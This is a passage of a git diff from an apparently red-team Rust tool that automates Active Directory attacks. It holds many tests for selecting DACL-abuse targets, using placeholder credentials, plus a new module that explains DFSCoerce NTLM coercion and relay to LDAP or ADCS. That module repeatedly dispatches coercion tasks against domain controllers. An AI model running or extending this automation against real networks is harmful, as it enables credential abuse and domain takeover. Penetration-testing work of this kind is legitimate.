+ .and_then(|v| v.as_str()) + .unwrap_or(""); + assert_eq!(target, "victim"); + + let details2 = serde_json::json!({"target_user": "v2"}); + let target2 = details2 + .get("target") + .or_else(|| details2.get("target_user")) + .or_else(|| details2.get("to")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + assert_eq!(target2, "v2"); + + let details3 = serde_json::json!({"to": "v3"}); + let target3 = details3 + .get("target") + .or_else(|| details3.get("target_user")) + .or_else(|| details3.get("to")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + assert_eq!(target3, "v3"); + } + + #[test] + fn ghost_machine_targets_rejected() { + assert!(is_ghost_machine_account("WIN-DPPJMLU3XS6$")); + } + + #[test] + fn credential_matching_with_domain() { + let source_user = "admin"; + let source_domain = "contoso.local"; + let cred_username = "Admin"; + let cred_domain = "CONTOSO.LOCAL"; + + let matches = cred_username.to_lowercase() == source_user.to_lowercase() + && (source_domain.is_empty() + || cred_domain.to_lowercase() == source_domain.to_lowercase()); + assert!(matches); + } + + #[test] + fn credential_matching_without_domain() { + let source_user = "admin"; + let source_domain = ""; + let cred_username = "admin"; + let cred_domain = "contoso.local"; + + let matches = cred_username.to_lowercase() == source_user.to_lowercase() + && (source_domain.is_empty() + || cred_domain.to_lowercase() == source_domain.to_lowercase()); + assert!(matches); + } + + #[test] + fn credential_matching_wrong_user() { + let source_user = "admin"; + let source_domain = "contoso.local"; + let cred_username = "jdoe"; + let cred_domain = "contoso.local"; + + let matches = cred_username.to_lowercase() == source_user.to_lowercase() + && (source_domain.is_empty() + || cred_domain.to_lowercase() == source_domain.to_lowercase()); + assert!(!matches); + } + + #[test] + fn credential_matching_wrong_domain() { + let source_user = "admin"; + let source_domain = "contoso.local"; + let cred_username = "admin"; + let cred_domain = "fabrikam.local"; + + let matches = cred_username.to_lowercase() == source_user.to_lowercase() + && (source_domain.is_empty() + || cred_domain.to_lowercase() == source_domain.to_lowercase()); + assert!(!matches); + } + + #[test] + fn dacl_payload_structure() { + let payload = serde_json::json!({ + "technique": "dacl_abuse", + "acl_type": "forcechangepassword", + "vuln_id": "vuln-acl-001", + "source_user": "admin", + "target_user": "victim", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": "admin", + "password": "P@ssw0rd!", + "domain": "contoso.local", + }, + }); + assert_eq!(payload["technique"], "dacl_abuse"); + assert_eq!(payload["acl_type"], "forcechangepassword"); + assert_eq!(payload["source_user"], "admin"); + assert_eq!(payload["target_user"], "victim"); + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn acl_vuln_type_case_insensitive() { + for t in [ + "ForceChangePassword", + "FORCECHANGEPASSWORD", + "forcechangepassword", + ] { + let vtype = t.to_lowercase(); + assert!(vtype.contains("forcechangepassword"), "{t} should match"); + } + } + + #[test] + fn source_user_from_key() { + let details = serde_json::json!({"from": "svc_account"}); + let source = details + .get("source") + .or_else(|| details.get("source_user")) + .or_else(|| details.get("from")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + assert_eq!(source, "svc_account"); + } + + // -- collect_dacl_work integration tests -- + + use crate::orchestrator::state::SharedState; + use ares_core::models::{Credential, VulnerabilityInfo}; + use std::collections::HashMap; + + fn make_credential(username: &str, domain: &str) -> Credential { + Credential { + id: format!("cred-{username}"), + username: username.to_string(), + password: "P@ssw0rd!".to_string(), // pragma: allowlist secret + domain: domain.to_string(), + source: String::new(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + } + } + + fn make_vuln( + vuln_id: &str, + vuln_type: &str, + details: HashMap, + ) -> VulnerabilityInfo { + VulnerabilityInfo { + vuln_id: vuln_id.to_string(), + vuln_type: vuln_type.to_string(), + target: "192.168.58.10".to_string(), + discovered_by: "bloodhound".to_string(), + discovered_at: chrono::Utc::now(), + details, + recommended_agent: String::new(), + priority: 5, + } + } + + fn acl_details(source: &str, target: &str, domain: &str) -> HashMap { + let mut m = HashMap::new(); + m.insert("source".to_string(), serde_json::json!(source)); + m.insert("target".to_string(), serde_json::json!(target)); + m.insert("source_domain".to_string(), serde_json::json!(domain)); + m + } + + #[tokio::test] + async fn collect_empty_state_no_work() { + let shared = SharedState::new("test".into()); + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_no_credentials_no_work() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + let details = acl_details("admin", "victim", "contoso.local"); + let vuln = make_vuln("vuln-001", "ForceChangePassword", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_forcechangepassword_produces_work() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "contoso.local")); + let details = acl_details("admin", "victim", "contoso.local"); + let vuln = make_vuln("vuln-fcp-001", "ForceChangePassword", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].vuln_type, "forcechangepassword"); + assert_eq!(work[0].source_user, "admin"); + assert_eq!(work[0].target_user, "victim"); + assert_eq!(work[0].domain, "contoso.local"); + } + + #[tokio::test] + async fn collect_genericwrite_produces_work() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("svc_sql", "contoso.local")); + let details = acl_details("svc_sql", "targetuser", "contoso.local"); + let vuln = make_vuln("vuln-gw-001", "GenericWrite", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].vuln_type, "genericwrite"); + } + + #[tokio::test] + async fn collect_writedacl_produces_work() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("operator", "contoso.local")); + let details = acl_details("operator", "targetobj", "contoso.local"); + let vuln = make_vuln("vuln-wd-001", "WriteDacl", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].vuln_type, "writedacl"); + } + + #[tokio::test] + async fn collect_writeowner_produces_work() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("operator", "contoso.local")); + let details = acl_details("operator", "targetobj", "contoso.local"); + let vuln = make_vuln("vuln-wo-001", "WriteOwner", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].vuln_type, "writeowner"); + } + + #[tokio::test] + async fn collect_genericall_produces_work() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "contoso.local")); + let details = acl_details("admin", "victim", "contoso.local"); + let vuln = make_vuln("vuln-ga-001", "GenericAll", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].vuln_type, "genericall"); + } + + #[tokio::test] + async fn collect_self_membership_produces_work() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("user1", "contoso.local")); + let details = acl_details("user1", "Domain Admins", "contoso.local"); + let vuln = make_vuln("vuln-sm-001", "self_membership", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].vuln_type, "self_membership"); + } + + #[tokio::test] + async fn collect_sid_source_resolves_via_domain_admin() { + // BloodHound emits ACL edges where the source is a SID for a + // well-known group (e.g. Enterprise Admins ending in -519). The + // resolver should pick any DA-marked credential in the same domain. + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + let mut da = make_credential("admin", "contoso.local"); + da.is_admin = true; + state.credentials.push(da); + state.domain_sids.insert( + "contoso.local".to_string(), + "S-1-5-21-111-222-333".to_string(), + ); + let details = acl_details("S-1-5-21-111-222-333-519", "victim", "contoso.local"); + let vuln = make_vuln("vuln-sid-001", "GenericAll", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].vuln_type, "genericall"); + // source_user must be the resolved cred's SAM, not the raw SID — the + // credential_resolver looks up password by `(username, domain)`, and + // a SID never matches a credential record. + assert_eq!(work[0].source_user, "admin"); + } + + #[tokio::test] + async fn collect_sid_source_non_privileged_rid_skipped() { + // Only well-known privileged RIDs are auto-resolved; an arbitrary + // user SID (RID >= 1000) requires an exact match. + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + let mut da = make_credential("admin", "contoso.local"); + da.is_admin = true; + state.credentials.push(da); + state.domain_sids.insert( + "contoso.local".to_string(), + "S-1-5-21-111-222-333".to_string(), + ); + let details = acl_details("S-1-5-21-111-222-333-1105", "victim", "contoso.local"); + let vuln = make_vuln("vuln-sid-002", "GenericAll", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_write_membership_produces_work() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("user1", "contoso.local")); + let details = acl_details("user1", "Domain Admins", "contoso.local"); + let vuln = make_vuln("vuln-wm-001", "write_membership", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].vuln_type, "write_membership"); + } + + #[tokio::test] + async fn collect_non_acl_vuln_skipped() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "contoso.local")); + let details = acl_details("admin", "dc01", "contoso.local"); + let vuln = make_vuln("vuln-smb-001", "smb_signing_disabled", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_already_exploited_skipped() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "contoso.local")); + let details = acl_details("admin", "victim", "contoso.local"); + let vuln = make_vuln("vuln-fcp-002", "ForceChangePassword", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + state + .exploited_vulnerabilities + .insert("vuln-fcp-002".to_string()); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_already_processed_dedup_skipped() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "contoso.local")); + let details = acl_details("admin", "victim", "contoso.local"); + let vuln = make_vuln("vuln-fcp-003", "ForceChangePassword", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + state.mark_processed(DEDUP_DACL_ABUSE, "dacl:vuln-fcp-003".to_string()); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_source_user_empty_skipped() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "contoso.local")); + let mut details = HashMap::new(); + details.insert("target".to_string(), serde_json::json!("victim")); + let vuln = make_vuln("vuln-fcp-004", "ForceChangePassword", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_no_matching_credential_skipped() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("otheruser", "contoso.local")); + let details = acl_details("admin", "victim", "contoso.local"); + let vuln = make_vuln("vuln-fcp-005", "ForceChangePassword", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_case_insensitive_credential_match() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("Admin", "CONTOSO.LOCAL")); + let details = acl_details("admin", "victim", "contoso.local"); + let vuln = make_vuln("vuln-fcp-006", "ForceChangePassword", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].source_user, "admin"); + } + + #[tokio::test] + async fn collect_dc_ip_resolved_from_domain_controllers() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "contoso.local")); + state + .domain_controllers + .insert("contoso.local".to_string(), "192.168.58.10".to_string()); + let details = acl_details("admin", "victim", "contoso.local"); + let vuln = make_vuln("vuln-fcp-007", "ForceChangePassword", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + } + + #[tokio::test] + async fn collect_dc_ip_empty_when_no_dc_mapping() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "contoso.local")); + let details = acl_details("admin", "victim", "contoso.local"); + let vuln = make_vuln("vuln-fcp-008", "ForceChangePassword", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dc_ip, ""); + } + + #[tokio::test] + async fn collect_credential_domain_mismatch_skipped() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "fabrikam.local")); + let details = acl_details("admin", "victim", "contoso.local"); + let vuln = make_vuln("vuln-fcp-009", "ForceChangePassword", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_empty_source_domain_matches_any_cred_domain() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "fabrikam.local")); + let mut details = HashMap::new(); + details.insert("source".to_string(), serde_json::json!("admin")); + details.insert("target".to_string(), serde_json::json!("victim")); + let vuln = make_vuln("vuln-fcp-010", "ForceChangePassword", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "fabrikam.local"); + } + + #[tokio::test] + async fn collect_multiple_vulns_produces_multiple_work_items() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "contoso.local")); + + for (i, vtype) in ["ForceChangePassword", "GenericAll", "WriteDacl"] + .iter() + .enumerate() + { + let details = acl_details("admin", &format!("target{i}"), "contoso.local"); + let vuln = make_vuln(&format!("vuln-multi-{i}"), vtype, details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 3); + } + + #[tokio::test] + async fn collect_dedup_key_format_matches() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "contoso.local")); + let details = acl_details("admin", "victim", "contoso.local"); + let vuln = make_vuln("vuln-dk-001", "GenericAll", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "dacl:vuln-dk-001"); + } + + #[tokio::test] + async fn collect_source_user_fallback_to_from_key() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("svc_account", "contoso.local")); + let mut details = HashMap::new(); + details.insert("from".to_string(), serde_json::json!("svc_account")); + details.insert("target".to_string(), serde_json::json!("victim")); + details.insert( + "source_domain".to_string(), + serde_json::json!("contoso.local"), + ); + let vuln = make_vuln("vuln-from-001", "GenericWrite", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].source_user, "svc_account"); + } + + #[tokio::test] + async fn collect_target_user_fallback_to_target_user_key() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "contoso.local")); + let mut details = HashMap::new(); + details.insert("source".to_string(), serde_json::json!("admin")); + details.insert( + "target_user".to_string(), + serde_json::json!("fallback_target"), + ); + details.insert( + "source_domain".to_string(), + serde_json::json!("contoso.local"), + ); + let vuln = make_vuln("vuln-tu-001", "WriteDacl", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_user, "fallback_target"); + } +} diff --git a/ares-cli/src/orchestrator/automation/dfs_coercion.rs b/ares-cli/src/orchestrator/automation/dfs_coercion.rs new file mode 100644 index 00000000..ad9bc889 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/dfs_coercion.rs @@ -0,0 +1,450 @@ +//! auto_dfs_coercion -- trigger DFSCoerce (MS-DFSNM) NTLM coercion against DCs. +//! +//! DFSCoerce abuses the MS-DFSNM protocol (Distributed File System Namespace +//! Management) to force a DC to authenticate to an attacker listener. Unlike +//! PetitPotam, DFSCoerce requires valid domain credentials but works on +//! systems where PetitPotam's unauthenticated path has been patched. +//! +//! The captured NTLM auth can be relayed to LDAP (shadow creds, RBCD) or +//! ADCS web enrollment (ESC8). + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect DFS coercion work items from current state. +/// +/// Pure logic extracted from `auto_dfs_coercion` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. +fn collect_dfs_coercion_work(state: &StateInner, listener: &str) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for (domain, dc_ip) in &state.all_domains_with_dcs() { + if dc_ip.as_str() == listener { + continue; + } + + let dedup_key = format!("dfs_coerce:{dc_ip}"); + if state.is_processed(DEDUP_DFS_COERCION, &dedup_key) { + continue; + } + + let cred = match state + .credentials + .iter() + .find(|c| c.domain.to_lowercase() == domain.to_lowercase()) + .or_else(|| state.credentials.first()) + { + Some(c) => c.clone(), + None => continue, + }; + + items.push(DfsWork { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + listener: listener.to_string(), + credential: cred, + }); + } + + items +} + +/// Dispatches DFSCoerce against each DC that hasn't been DFS-coerced. +/// Interval: 45s. +pub async fn auto_dfs_coercion(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("dfs_coercion") { + continue; + } + + let listener = match dispatcher.config.listener_ip.as_deref() { + Some(ip) => ip.to_string(), + None => continue, + }; + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_dfs_coercion_work(&state, &listener) + }; + + for item in work { + let payload = json!({ + "technique": "dfs_coercion", + "target_ip": item.dc_ip, + "domain": item.domain, + "listener_ip": item.listener, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("dfs_coercion"); + match dispatcher + .throttled_submit("coercion", "coercion", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + "DFSCoerce (MS-DFSNM) coercion dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_DFS_COERCION, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_DFS_COERCION, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(dc = %item.dc_ip, "DFSCoerce task deferred"); + } + Err(e) => { + warn!(err = %e, dc = %item.dc_ip, "Failed to dispatch DFSCoerce"); + } + } + } + } +} + +struct DfsWork { + dedup_key: String, + domain: String, + dc_ip: String, + listener: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::state::StateInner; + use ares_core::models::Credential; + + fn make_credential(username: &str, password: &str, domain: &str) -> Credential { + Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn dedup_key_format() { + let key = format!("dfs_coerce:{}", "192.168.58.10"); + assert_eq!(key, "dfs_coerce:192.168.58.10"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_DFS_COERCION, "dfs_coercion"); + } + + #[test] + fn skips_self_listener() { + let dc_ip = "192.168.58.50"; + let listener = "192.168.58.50"; + assert_eq!(dc_ip, listener, "DC IP matching listener should be skipped"); + + let dc_ip2 = "192.168.58.10"; + assert_ne!(dc_ip2, listener, "Different IP should not be skipped"); + } + + #[test] + fn payload_structure_validation() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let payload = serde_json::json!({ + "technique": "dfs_coercion", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "listener_ip": "192.168.58.50", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + + assert_eq!(payload["technique"], "dfs_coercion"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["domain"], "contoso.local"); + assert_eq!(payload["listener_ip"], "192.168.58.50"); + assert_eq!(payload["credential"]["username"], "admin"); + assert_eq!(payload["credential"]["password"], "P@ssw0rd!"); // pragma: allowlist secret + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "testuser".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let work = DfsWork { + dedup_key: "dfs_coerce:192.168.58.10".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + listener: "192.168.58.50".into(), + credential: cred, + }; + + assert_eq!(work.dedup_key, "dfs_coerce:192.168.58.10"); + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.listener, "192.168.58.50"); + assert_eq!(work.credential.username, "testuser"); + } + + #[test] + fn self_targeting_prevention() { + let listener = "192.168.58.50"; + let dc_ips = ["192.168.58.10", "192.168.58.50", "192.168.58.20"]; + + let non_self: Vec<&&str> = dc_ips.iter().filter(|ip| **ip != listener).collect(); + + assert_eq!(non_self.len(), 2); + assert!(!non_self.contains(&&"192.168.58.50")); + assert!(non_self.contains(&&"192.168.58.10")); + assert!(non_self.contains(&&"192.168.58.20")); + } + + #[test] + fn domain_extraction_for_credential_match() { + let domain = "contoso.local"; + let cred_domain = "CONTOSO.LOCAL"; + assert_eq!( + cred_domain.to_lowercase(), + domain.to_lowercase(), + "Domain matching should be case-insensitive" + ); + + let domain2 = "fabrikam.local"; + assert_ne!( + cred_domain.to_lowercase(), + domain2.to_lowercase(), + "Different domains should not match" + ); + } + + // --- collect_dfs_coercion_work tests --- + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_dfs_coercion_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_dfs_coercion_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_dcs_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_dfs_coercion_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_dc_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_dfs_coercion_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].dedup_key, "dfs_coerce:192.168.58.10"); + assert_eq!(work[0].listener, "192.168.58.50"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_skips_dc_matching_listener() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.50".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_dfs_coercion_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_already_processed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_DFS_COERCION, "dfs_coerce:192.168.58.10".into()); + let work = collect_dfs_coercion_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_multiple_dcs_produces_work_for_each() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_dfs_coercion_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 2); + let domains: Vec<&str> = work.iter().map(|w| w.domain.as_str()).collect(); + assert!(domains.contains(&"contoso.local")); + assert!(domains.contains(&"fabrikam.local")); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_dfs_coercion_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].credential.domain, "contoso.local"); + } + + #[test] + fn collect_falls_back_to_first_credential() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_dfs_coercion_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "crossuser"); + } + + #[test] + fn collect_dedup_skips_processed_keeps_unprocessed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_DFS_COERCION, "dfs_coerce:192.168.58.10".into()); + let work = collect_dfs_coercion_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "fabrikam.local"); + } + + #[tokio::test] + async fn collect_via_shared_state() { + let shared = SharedState::new("test-op".into()); + { + let mut state = shared.write().await; + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_dfs_coercion_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + } +} diff --git a/ares-cli/src/orchestrator/automation/dns_enum.rs b/ares-cli/src/orchestrator/automation/dns_enum.rs new file mode 100644 index 00000000..8d3e5bc7 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/dns_enum.rs @@ 